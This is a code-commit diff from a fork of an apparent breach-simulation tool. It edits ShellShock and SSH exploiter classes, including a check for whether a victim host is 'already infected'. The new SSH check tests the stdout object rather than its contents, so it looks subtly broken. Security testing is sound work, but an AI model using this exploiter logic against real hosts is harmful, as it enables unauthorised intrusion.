forked from p34709852/monkey
Fixed bug in HTTPFingering
Added support for skip_exploit_if_file_exists in linux exploiters. Delayed/fixed a race in the monkey patching that gevents does.
This commit is contained in:
parent
cd27438a1e
commit
d80c670392
|
@ -9,7 +9,6 @@ from model.host import VictimHost
|
|||
from shellshock_resources import CGI_FILES
|
||||
from model import MONKEY_ARG
|
||||
from exploit.tools import get_target_monkey, HTTPTools, report_failed_login
|
||||
import grequests
|
||||
import requests
|
||||
|
||||
__author__ = 'danielg'
|
||||
|
@ -38,8 +37,10 @@ class ShellShockExploiter(HostExploiter):
|
|||
def exploit_host(self, host, depth=-1, src_path=None):
|
||||
assert isinstance(host, VictimHost)
|
||||
# start by picking ports
|
||||
valid_ports = [(port, host.services['tcp-' + str(port)][1]) for port in self.HTTP if
|
||||
'tcp-' + str(port) in host.services]
|
||||
candidate_services = {service: host.services[service] for service in host.services if host.services[service]['name'] == 'http'}
|
||||
|
||||
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
|
||||
'tcp-' + str(port) in candidate_services]
|
||||
http_ports = [port[0] for port in valid_ports if not port[1]]
|
||||
https_ports = [port[0] for port in valid_ports if port[1]]
|
||||
|
||||
|
@ -192,6 +193,7 @@ class ShellShockExploiter(HostExploiter):
|
|||
Checks if which urls exist
|
||||
:return: Sequence of URLs to try and attack
|
||||
"""
|
||||
import grequests
|
||||
attack_path = 'http://'
|
||||
if is_https:
|
||||
attack_path = 'https://'
|
||||
|
|
|
@ -102,19 +102,20 @@ class SSHExploiter(HostExploiter):
|
|||
except Exception, exc:
|
||||
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
||||
|
||||
if self.skip_exist:
|
||||
_, stdout, stderr = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux)
|
||||
stdout_res = stdout.read().strip()
|
||||
if stdout_res:
|
||||
# file exists
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % host)
|
||||
return True # return already infected
|
||||
|
||||
src_path = src_path or get_target_monkey(host)
|
||||
|
||||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||
return False
|
||||
|
||||
if self._config.skip_exploit_if_file_exist:
|
||||
_, stdout, _ = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux)
|
||||
if stdout:
|
||||
# file exists
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % host)
|
||||
return True # return already infected
|
||||
|
||||
try:
|
||||
ftp = ssh.open_sftp()
|
||||
|
||||
|
|
|
@ -32,7 +32,9 @@ class HTTPFinger(HostFinger):
|
|||
with closing(head(url, verify=False, timeout=1)) as req:
|
||||
server = req.headers.get('Server')
|
||||
ssl = True if 'https://' in url else False
|
||||
host.services['tcp-' + port[1]] = (server,ssl)
|
||||
host.services['tcp-' + port[1]] = {}
|
||||
host.services['tcp-' + port[1]]['name'] = 'http'
|
||||
host.services['tcp-' + port[1]]['data'] = (server,ssl)
|
||||
break # https will be the same on the same port
|
||||
except Timeout:
|
||||
pass
|
||||
|
|
Loading…
Reference in New Issue